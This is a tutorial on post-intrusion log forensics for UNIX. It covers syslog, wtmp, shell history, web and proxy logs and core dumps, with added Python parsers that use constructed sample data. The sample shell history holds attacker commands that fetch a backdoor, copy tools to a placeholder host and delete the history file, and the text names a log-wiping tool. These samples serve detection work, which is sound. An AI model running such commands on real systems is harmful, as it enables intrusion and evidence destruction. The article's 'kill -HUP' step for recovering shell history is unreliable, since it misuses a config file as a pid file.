After a UNIX system has been compromised, it is very important to determine what was lost and where the attack came from. Most intruders know to use an already-compromised machine as a stepping stone when attacking your server, but what they did before the formal attack (the exploratory scanning) often started from their own computers. The following describes how to analyze the logs of a compromised system to determine the intruder's IP address.
1. messages
/var/adm is the UNIX log directory (/var/log on Linux). It contains quite a few log files in ASCII format. Let us start with the messages file, which is usually the one intruders are most interested in, since it records system-level information: everything from copyright and hardware notices at boot to login events. The following is a record of a failed login:
Apr 29 19:06:47 www login[28845]: FAILED LOGIN 1 FROM xxx.xxx, User not known to the underlying authentication module
And this is a record of a login session being opened for the user ncx:
Apr 29 22:05:45 game PAM_pwdb[29509]: (login) session opened for user ncx by (uid=0)
The first step should be to send syslogd a HUP so that it flushes and reopens its log files: kill -HUP `cat /var/run/syslogd.pid`. Of course, the intruder may already have done this.
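The two record types quoted above are easy to pick apart mechanically, and on a busy host that is the only practical way to see which source produced the failures and which sessions were opened around the same time. The following is an added example, not code from the original article: it parses constructed messages lines in the same style (the addresses are RFC 5737 documentation addresses, not real sources), counts failed logins per source and lists the sessions that were opened.

```python
import re
from collections import Counter

# Constructed sample lines in the style of the messages records quoted above
# (not real log data). RFC 5737 documentation addresses stand in for sources.
SAMPLE_MESSAGES = """\
Apr 29 19:06:47 www login[28845]: FAILED LOGIN 1 FROM 192.0.2.7, User not known to the underlying authentication module
Apr 29 19:06:52 www login[28845]: FAILED LOGIN 2 FROM 192.0.2.7, Authentication failure
Apr 29 19:07:10 www login[28901]: FAILED LOGIN 1 FROM 198.51.100.23, User not known to the underlying authentication module
Apr 29 22:05:45 game PAM_pwdb[29509]: (login) session opened for user ncx by (uid=0)
Apr 29 22:06:01 www login[28950]: FAILED LOGIN 1 FROM 192.0.2.7, Authentication failure
Apr 29 22:07:13 game PAM_pwdb[29530]: (login) session opened for user alice by (uid=0)
"""

# "Mon DD HH:MM:SS host " prefix shared by every syslog line.
SYSLOG_PREFIX = r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "

# login(1) failure record; case-insensitive so both "FAILED LOGIN" and the
# lower-case spelling quoted in the article are accepted.
FAILED_RE = re.compile(
    SYSLOG_PREFIX
    + r"login\[(?P<pid>\d+)\]: failed login (?P<attempt>\d+) from (?P<src>[^,]+), (?P<reason>.*)$",
    re.IGNORECASE,
)

# PAM "session opened" record; the uid in parentheses is the uid of the
# process that opened the session (0 means login running as root).
SESSION_RE = re.compile(
    SYSLOG_PREFIX
    + r"\S+: \(login\) session opened for user (?P<user>\S+) by \(uid\s*=\s*(?P<uid>\d+)\s*\)$"
)


def parse_messages(text):
    """Split a messages file into (failed_logins, opened_sessions), lists of dicts."""
    failures, sessions = [], []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            failures.append(m.groupdict())
            continue
        m = SESSION_RE.match(line)
        if m:
            sessions.append(m.groupdict())
    return failures, sessions


def failures_by_source(text):
    """Count failed logins per source address or host name."""
    failures, _ = parse_messages(text)
    return dict(Counter(f["src"].strip() for f in failures))


def suspicious_sources(text, threshold=2):
    """Sources with at least `threshold` failures, most active first."""
    counts = failures_by_source(text)
    return sorted((s for s, n in counts.items() if n >= threshold),
                  key=lambda s: -counts[s])


def sessions_opened(text):
    """(timestamp, host, user, opening uid) for every session-opened record."""
    _, sessions = parse_messages(text)
    return [(s["ts"], s["host"], s["user"], int(s["uid"])) for s in sessions]


if __name__ == "__main__":
    for src, n in failures_by_source(SAMPLE_MESSAGES).items():
        print(f"{n:3d} failed logins from {src}")
    for ts, host, user, uid in sessions_opened(SAMPLE_MESSAGES):
        print(f"{ts} {host}: session opened for {user} (by uid {uid})")
```

Run it against a real file with parse_messages(open("/var/log/messages").read()); the session list next to the failure counts is what lets you tie a burst of failures to the login that eventually succeeded.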
2. wtmp and utmp logs, FTP log
You can find files named wtmp and utmp in the /var/adm, /var/log or /etc directory; they record when and from where users logged in to the host remotely. Among hacker tools, zap2 (the compiled binary is usually called z2 or wipe) is the oldest and most popular one for "erasing" a user's login records from these two files. However, out of laziness or because of a slow link, many intruders never upload or compile it, and the administrator can then use the lastlog command to obtain the source address of the intruder's most recent connection (which may, of course, be one of their stepping stones). The FTP log is usually /var/log/xferlog; it records in detail the time, source and file name of every file uploaded over FTP. This log is too obvious, though, so the better intruders hardly ever use FTP to transfer files; they generally use rcp.
3. sh_history
After obtaining root, intruders can create their own accounts for later access. A more advanced technique is to set a password on a rarely used system account such as uucp or lp. Even if the intruder deletes the .sh_history or .bash_history file after the intrusion, running kill -HUP `cat /var/run/inetd.conf` writes the shell command history still held in memory back to disk; then run find / -name .sh_history -print and carefully check every suspicious shell command in the logs. You can find them under /usr/spool/lp (lp's home directory), /usr/lib/uucp/ and similar directories. The sh_history file may also contain commands such as ftp xxx.xxx.xxx.xxx or rcp nobody@xxx.xxx.xxx.xxx:/tmp/backdoor, which reveal the intruder's IP address or domain name.
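Reading every recovered history file by hand is slow, and the lines that matter are exactly the ones quoted above: commands that name a remote host. The following is an added example, not code from the original article; it walks the filesystem for shell history files (the Python counterpart of the find command above) and pulls the remote endpoints out of ftp/telnet-style commands and [user@]host:path arguments of rcp and scp. The sample history is constructed; its addresses are RFC 5737 documentation ranges and evil.example.net is a placeholder name.

```python
import os
import re

# Constructed sample .sh_history contents (not from a real system).
SAMPLE_HISTORY = """\
w
cd /tmp
ftp 192.0.2.7
rcp nobody@198.51.100.23:/tmp/backdoor /tmp/.x
scp tools.tgz evil.example.net:/tmp
telnet 203.0.113.5 1234
chmod +x /tmp/.x
rm -f ~/.sh_history
"""

HISTORY_NAMES = {".sh_history", ".bash_history", ".history"}
# Commands whose first non-option argument is a remote host.
HOST_ARG_CMDS = {"ftp", "telnet", "rsh", "rlogin", "tftp", "ncftp"}
# Commands whose arguments use the [user@]host:path form.
COPY_CMDS = {"rcp", "scp"}

IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
HOST_RE = re.compile(r"[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


def is_host(token):
    """True for a dotted-quad address or a dotted host name."""
    return bool(IP_RE.fullmatch(token) or HOST_RE.fullmatch(token))


def find_history_files(root="/"):
    """Python equivalent of: find / -name .sh_history -print (plus other shells' names)."""
    found = []
    for dirpath, _subdirs, files in os.walk(root):
        for name in files:
            if name in HISTORY_NAMES:
                found.append(os.path.join(dirpath, name))
    return found


def remote_endpoints(history_text):
    """Return (line_number, command, host) for history lines that reach a remote host."""
    hits = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        parts = line.split()
        if not parts:
            continue
        cmd = os.path.basename(parts[0])  # "/usr/bin/ftp" -> "ftp"
        if cmd in HOST_ARG_CMDS:
            args = [a for a in parts[1:] if not a.startswith("-")]
            if args and is_host(args[0]):
                hits.append((lineno, cmd, args[0]))
        elif cmd in COPY_CMDS:
            for arg in parts[1:]:
                if ":" in arg:  # only host:path arguments, never local file names
                    host = arg.split(":", 1)[0].split("@")[-1]
                    if is_host(host):
                        hits.append((lineno, cmd, host))
    return hits


if __name__ == "__main__":
    for lineno, cmd, host in remote_endpoints(SAMPLE_HISTORY):
        print(f"line {lineno}: {cmd} -> {host}")
```

Feed each path from find_history_files("/") through remote_endpoints(open(path).read()); a history under /usr/spool/lp or /usr/lib/uucp that contains any hit at all deserves a close look, since those accounts have no business copying files from the network.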
4. HTTP server logs
This is the most effective way to determine the attacker's real source address. Take the most popular server, Apache, as an example. In the logs/ directory under the Apache installation you can find the file access.log, which records each visitor's IP address, access time and requested content. After a break-in we should be able to find records similar to the following in this file:
xxx.xxx.xxx.xxx [28/Apr/2000:00:29:05 -0800] "GET /cgi-bin/rguest.exe" 404 -
xxx.xxx.xxx.xxx [28/Apr/2000:00:28:57 -0800] "GET /msads/Samples/SELECTOR/showcode.asp" 404 -
This shows that at 00:28 on April 28, 2000 the intruder at IP address xxx.xxx.xxx.xxx tried to access the file /msads/Samples/SELECTOR/showcode.asp; this is the trace left behind by a web CGI scanner. Intruders running web scanners usually choose servers close to themselves, so combining the attack time with the IP address tells us a lot about them.
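What distinguishes the scanner trace above from ordinary browsing is the burst: many 404s for paths that do not exist on the host, all from one client within seconds. The following is an added example, not code from the original article; it parses constructed access.log lines in Apache common log format (it also accepts the abbreviated form quoted above) and reports the clients whose 404s cluster tightly in time, with the first and last timestamps that put the scan on the timeline. The thresholds (3 errors within 60 seconds) are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed access.log sample in common log format (not real traffic).
# The first four lines mimic the CGI-scanner trace quoted above.
SAMPLE_ACCESS_LOG = """\
192.0.2.7 - - [28/Apr/2000:00:28:57 -0800] "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0" 404 -
192.0.2.7 - - [28/Apr/2000:00:29:05 -0800] "GET /cgi-bin/rguest.exe HTTP/1.0" 404 -
192.0.2.7 - - [28/Apr/2000:00:29:06 -0800] "GET /cgi-bin/handler HTTP/1.0" 404 -
192.0.2.7 - - [28/Apr/2000:00:29:08 -0800] "GET /scripts/samples/search.asp HTTP/1.0" 404 -
198.51.100.4 - - [28/Apr/2000:08:12:41 -0800] "GET /index.html HTTP/1.0" 200 1043
198.51.100.4 - - [28/Apr/2000:08:12:45 -0800] "GET /images/logo.gif HTTP/1.0" 200 2210
203.0.113.9 - - [28/Apr/2000:09:00:02 -0800] "GET /old.html HTTP/1.0" 404 -
"""

# Accepts full common log format as well as the abbreviated form quoted in the
# article (no ident/user fields, no HTTP version in the request).
LOG_RE = re.compile(
    r'^(?P<ip>\S+)(?: \S+ \S+)? \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_access_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def find_scanners(entries, min_errors=3, window_seconds=60):
    """Clients that produced at least min_errors 404s inside window_seconds.

    Returns {ip: {"count", "first", "last", "paths"}} where first/last are the
    timestamps of that client's earliest and latest 404.
    """
    not_found = defaultdict(list)
    for e in entries:
        if e["status"] == 404:
            not_found[e["ip"]].append(e)

    scanners = {}
    for ip, errs in not_found.items():
        errs.sort(key=lambda e: e["ts"])
        start = 0
        # Sliding window over this client's sorted 404 timestamps.
        for end in range(len(errs)):
            while (errs[end]["ts"] - errs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= min_errors:
                scanners[ip] = {
                    "count": len(errs),
                    "first": errs[0]["ts"],
                    "last": errs[-1]["ts"],
                    "paths": sorted({e["path"] for e in errs}),
                }
                break
    return scanners


if __name__ == "__main__":
    for ip, info in find_scanners(parse_access_log(SAMPLE_ACCESS_LOG)).items():
        print(f"{ip}: {info['count']} x 404 between "
              f"{info['first']:%d/%b/%Y %H:%M:%S} and {info['last']:%H:%M:%S}")
        for path in info["paths"]:
            print("   ", path)
```

The "first" timestamp is the one to compare against the messages, wtmp and history evidence from the earlier sections: the scan is normally the earliest event in the whole intrusion, and a client that scanned from its own address before the break-in is the lead the article is after.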
5. Core dump
A secure and stable daemon does not dump core during normal operation. When an intruder attacks a remote vulnerability, many services are in the middle of a getpeername() socket call, so the intruder's IP address is also left in memory, and therefore in the core file.
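The peer address getpeername() returns is stored in a struct sockaddr_in, which has a fixed and recognizable layout, so a core file can be searched for it directly rather than hoping the address also appears as text. The following is an added example, not code from the original article: it scans a byte string for plausible sockaddr_in values and decodes them. It assumes the Linux/x86 layout (2-byte family in host byte order, big-endian port, 4-byte address, 8 zero bytes of padding); the "core" it runs on is a constructed stand-in, not a real dump.

```python
import ipaddress
import socket
import struct


def find_sockaddr_in(blob, family_byteorder="<"):
    """Scan a byte string for plausible struct sockaddr_in values.

    Assumed layout (Linux, 16 bytes): sin_family (2 bytes, host byte order;
    "<" for x86), sin_port (2 bytes, network byte order), sin_addr (4 bytes),
    then 8 bytes of zero padding. This is a heuristic: a zero port, an
    unspecified address or non-zero padding rejects the candidate, which
    removes most accidental matches in a large image.
    Returns a list of (offset, "a.b.c.d", port).
    """
    family = struct.pack(family_byteorder + "H", socket.AF_INET)
    hits = []
    for off in range(len(blob) - 15):  # last offset with 16 bytes available
        if blob[off:off + 2] != family:
            continue
        (port,) = struct.unpack("!H", blob[off + 2:off + 4])
        addr = ipaddress.IPv4Address(blob[off + 4:off + 8])
        padding = blob[off + 8:off + 16]
        if port == 0 or addr.is_unspecified or padding != b"\x00" * 8:
            continue
        hits.append((off, str(addr), port))
    return hits


def build_fake_core():
    """Constructed stand-in for a core image (not a real dump): filler bytes
    with one sockaddr_in for 192.0.2.7, port 31337, embedded at offset 41."""
    peer = (struct.pack("<H", socket.AF_INET)
            + struct.pack("!H", 31337)
            + socket.inet_aton("192.0.2.7")
            + b"\x00" * 8)
    return b"\x7fELF" + b"\x41" * 37 + peer + b"\x00" * 20 + b"junk data" * 5


if __name__ == "__main__":
    for off, addr, port in find_sockaddr_in(build_fake_core()):
        print(f"offset {off}: {addr}:{port}")
```

On a real system use find_sockaddr_in(open("core", "rb").read()), passing ">" as the byte order on big-endian hosts; expect a few candidates (the daemon's own listening address among them) and compare each against the other log sources. Running strings(1) over the core and looking for dotted-quad text complements this, since some services also format the peer address for their own logging.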
6. Proxy server logs
A proxy server is often used by large and medium-sized enterprise networks as the interface for exchanging information between the inside and the outside, and it faithfully records every user's accesses, including of course those of intruders. Take the most common proxy, squid, as an example: you can usually find its huge log file access.log under /usr/local/squid/logs. Squid's log-analysis scripts are available at http://www.squid-cache.org/Doc/Users-Guide/added/st.html. By analyzing accesses to sensitive files in this log, you can find out who accessed content that should have stayed confidential.
7. Router logs
By default, routers do not log scans or logins, so intruders often use them as stepping stones. If your enterprise network is divided into militarized and demilitarized zones, turning on router logging will help track intruders later. More importantly, for administrators this setting makes it possible to determine whether the attacker is an insider or an outsider. Of course, you need an additional server to hold the router.log file.
Note!
It is unlikely that an intruder can avoid ever establishing a TCP connection with the target machine over the course of an attack. There are many subjective and objective reasons for this on the intruder's side, and in any case it is quite difficult to carry out an attack without leaving any logs at all.
If we spend enough time and energy, we can extract information about the intruder from the mass of logs. In terms of intruder psychology, the more privileges they have obtained on the target machine, the more inclined they are to connect to it cautiously; by carefully analyzing the early logs, especially those containing the scans, we keep the advantage.
Log auditing is only a passive defense after an intrusion has happened. Actively keeping up with security knowledge and upgrading or patching the system in time is the most effective way to prevent intrusion.